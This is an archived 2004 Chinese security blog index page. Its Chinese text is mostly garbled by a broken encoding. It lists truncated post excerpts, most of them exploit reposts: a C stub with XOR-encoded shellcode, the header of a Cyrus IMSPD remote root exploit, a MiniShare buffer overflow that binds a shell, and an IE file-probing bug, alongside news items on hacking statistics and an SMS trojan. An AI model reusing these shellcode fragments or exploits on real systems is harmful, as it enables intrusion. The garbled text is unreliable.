ïw¤ÎBlog
来源: BlogBus 原始链接: http://www.blogbus.com:80/blogbus/blog/index.php?blogid=16980&pg=3&cat= 存档链接: https://web.archive.org/web/20041124063022id_/http://www.blogbus.com:80/blogbus/blog/index.php?blogid=16980&pg=3&cat=
ïw¤ÎBlog ÃΣ¬·ÉÆðµÄµØ·½ diary (33) article (45) exploit (57) 2004 Äê 11 Ô Sun Mon Tue Wen Thu Fri Sat 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 ×îÐÂÎÄÕ SLmail 5.x POP3 Remote Pass Buffer Overflow Exploit Apache <= 2.0.52 HTTP GET Remote Denial of Service Exploit Ç÷ÊƿƼ¼½«·¢²¼Ð¿îÇ÷ÊƿƼ¼ÍøÂ粡¶¾Ç½ VeriSign³Æ£º90%ÍøÂç¹¥»÷À´×ÔÃÀ¹ú¿í´øÓû§ UBB.Threads 6.2.-6.3. one char bruteforce Exploit Multiple Antivirus Products Virus Detection Bypass PoC Exploit Eudora 6.2 Remote Attachment Spoofing Proof of Concept IPSwitch-IMail 8.13 Delete Command stack overflow Exploit Kerio Personal Firewall Multiple IP Options Denial of Service PoC NetNote Server v2.2 build 230 ×îÐÂÆÀÂÛ ¹Â¹â½£Òþ : Ö÷°åÏÔ¿¨»úÏä»»¡£. ¹Â¹â½£Òþ : ºÇºÇ¡£¡£B4½Ãñ£¬. alvashev : ͬÀÖͬÀÖ . Á´½Ó 56TECH ÄÏÒþÊÀ¼Ò ÷ÁÖÐ¡í¬ ÍøÂç¼¼ÊõÁªÃË °µµØDZÁ÷ ´æµµ 2004/05/31/-2004/05/31 2004/06/01/-2004/06/04 2004/06/05/-2004/06/28 2004/06/29/-2004/10/27 2004/10/28/-2004/11/05 2004/11/06/-2004/11/13 2004-11-12 07:04 - [ exploit ] #include <stdio.h> #include <windows.h> #include <winsock.h>
#pragma comment(lib, "ws2_32")
unsigned char EndChar[]= "x20x48x54x54x50x2Fx31x2Ex30x0Dx0Ax0Dx0A"; // HTTP/1.0
unsigned char shellcode[] = "xebx0ex5bx4bx33xc9xb1xfex80x34x0bxeexe2xfaxebx05"
"xe8xedxffxffxff"
/* 254 bytes shellcode, xor with 0xee / / offset .............. ÔĶÁÈ«ÎÄ | ÆÀÂÛ(0) | ÒýÓÃ(0) bamb00 @ 2004-11-12 07:04 | ±à¼ 2004-11-11 12:14 - [ exploit ] /* ** Cyrus IMSPD Remote Root Exploit ** ------------------------------- ** ** Bug found by: Dark Eagle <darkeagle [at] list d0t ru> ** Exploit coded by: Carlos Barros <barros [at] barrossecurity d0t com> ** Home Page: http://www.barrossecurity.com ** ** Exploitation techinique: ** ** This bug is a simple format string bug. While coding this exploit, I found just two *.............. ÔĶÁÈ«ÎÄ | ÆÀÂÛ(0) | ÒýÓÃ(0) bamb00 @ 2004-11-11 12:14 | ±à¼ 2004-11-11 12:13 - [ exploit ] /
MiniShare <= 1.4.1, Remote Buffer Overflow Exploit v0.1. Bind a shellcode to the port 101.
Full disclosure and exploit by class101 [at] DFind.kd-team.com [&] #n3ws [at] EFnet 07 november 2004
Thanx to HDMoore and Metasploit.com for their kickass ASM work.
WHAT IS MINISHARE
Homepage - http://minishare.sourceforge.net/ .............. ÔĶÁÈ«ÎÄ | ÆÀÂÛ(0) | ÒýÓÃ(0) bamb00 @ 2004-11-11 12:13 | ±à¼ 2004-11-11 12:12 - [ exploit ] Description:There is a security bug in Microsoft Internet Explorer, which allows tocheck up existence of local files in system directories (Root (C:/),WINDOWS, SYSTEM, SYSTEM32, DESKTOP, COMMAND, Internet Explorer).Successful exploitation allows the author of a malicious web site to planattacks against the target computer.The bug occurs, because Microsoft Internet Explorer .............. ÔĶÁÈ«ÎÄ | ÆÀÂÛ(0) | ÒýÓÃ(0) bamb00 @ 2004-11-11 12:12 | ±à¼ 2004-11-10 12:08 - [ article ] лªÍøÄϲý£±£±Ô£±£°Èյ磨ÕÔÀÚ ÕÅÃô À¶Ìì壩¼ÇÕß´ÓÕýÔÚ½Î÷Äϲý¾ÙÐеĵÚËĽìÖйúÍøÂçýÌåÂÛ̳Á˽⵽£¬Öйú¼ÆËã»úÓû§ÔâÊܺڿ͹¥»÷´ÎÊýÄê¾ùÉÏÉýÖÁÉÙ£±£°£¥£¬Ôö³¤ËÙ¶ÈÒÑÓë·¢´ï¹ú¼Ò»ù±¾Ïàͬ¡£ ¹ú¼Ò¼ÆËã»úÍøÂç·À·¶ÖÐÐÄÖ÷ÈÎÖúÀíÁõ±¦Ðñ²©Ê¿³Æ£¬ÓÉÓÚ¶àÊýÔâÊܺڿ͹¥»÷µÄµ¥Î»²»Ô¸ÒâÖ÷¶¯¶ÔÍ⹫²¼Êܹ¥»÷Çé¿ö£¬ºÜÄÑͳ¼ÆÖйú¼ÆËã»úÓû§ÔâÊܹ¥»÷µÄ¾«È·´ÎÊý£¬µ«¹ú¼ÒÓйز¿Ãŵĵ÷²é±íÃ÷£¬Ôö³¤ËÙ¶ÈÖÁÉÙ´ïµ½£±£°£¥¡£.............. ÔĶÁÈ«ÎÄ | ÆÀÂÛ(0) | ÒýÓÃ(0) bamb00 @ 2004-11-10 12:08 | ±à¼ 2004-11-10 12:07 - [ article ] Ò»ÖÖ¶ñÒâ³ÌÐòÒѾ¸ÐȾÁ˶íÂÞ˹µÄ²¿·ÖµçÄÔ£¬ÕâЩľÂí³ÌÐò»áÀûÓöí¹úµÄ¶ÌÐÅ·þÎñÏòÊÖ»úÓû§·¢ËÍÀ¬»ø¶ÌÏûÏ¢¡£ ÕâÖÖÌØÂåÒÁľÂíµÄÃû³ÆΪTroj/Delf-HA£¬ËüÄܹ»¿ØÖƱ»¸ÐȾµÄµçÄÔ£¬È»ºóÀûÓöíÂÞ˹µÄ¶ÌÐÅ·þÎñϵͳ£¬ÏòÊÖ»úÓû§·¢ËÍÀ¬»ø¶ÌÏûÏ¢¡£ Sophos·´²¡¶¾¹«Ë¾µÄ¸ß¼¶°²È«·ÖÎöÔ±Gregg Mastoras˵£º¡°ÊÖ»úÀ¬»øÓʼþ·Ç³£ÁîÈËÌÖÑᣬËü¿ÉÄܸøÓû§Ôì³É¾Þ´óµÄ»°·Ñ¸ºµ£¡£¶ÌÏûÏ¢À¬»øÓʼþÖÆ.............. ÔĶÁÈ«ÎÄ | ÆÀÂÛ(0) | ÒýÓÃ(0) bamb00 @ 2004-11-10 12:07 | ±à¼ ·ÖÒ³: [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] ×îºóÒ³ Ä£°åÉè¼Æ£º zhou